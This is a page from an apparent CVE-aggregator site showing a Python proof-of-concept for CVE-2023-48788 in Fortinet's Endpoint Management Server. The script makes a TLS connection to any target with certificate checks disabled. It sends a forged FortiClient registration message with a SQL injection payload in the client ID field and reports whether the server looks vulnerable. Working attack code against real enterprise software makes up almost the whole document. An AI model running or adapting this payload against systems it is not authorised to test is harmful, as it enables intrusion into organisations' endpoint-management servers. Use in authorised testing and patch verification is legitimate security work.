4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-48788
README.md
Rendering markdown...
POC / CVE-2023-48788.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import socket
import ssl


REGISTER = (
    "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
    + "IP=127.0.0.1\n"
    + "MAC=00-50-56-11-22-33\n"
    + "FCT_ONNET=0\n"
    + "CAPS=32767\n"
    + "VDOM=default\n"
    + "EC_QUARANTINED=0\n"
    + "SIZE=    {}\n"
    + "\n"
    + "X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n"
    + "X-FCCK-REGISTER-END"
    + "\r\n"
    + "\r\n"
)

SQLI = "' OR 1=1 --"


def send_message(target, port):
    sqli = SQLI
    msg_len = len(REGISTER + sqli)
    msg = REGISTER.format(sqli, msg_len)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5.0)
    addr = (target, int(port))
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    secure_socket = context.wrap_socket(s, server_hostname="asdf")
    secure_socket.connect(addr)
    secure_socket.send(msg.encode())
    print(f"[+] Sent Message!\n{msg}")
    response = secure_socket.recv(1024)
    print(response)
    if response and "KA_INTERVAL" in response.decode():
        print("[+] The target is vulnerable!")
    else:
        print("[-] The target is not vulnerable!")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-t",
        "--target",
        help="The Fortinet Endpoint Managment Server target IP address",
        required=True,
    )
    parser.add_argument(
        "-p",
        "--port",
        help="The Fortinet Endpoint Managment Server target port",
        required=True,
    )
    args = parser.parse_args()

    send_message(args.target, args.port)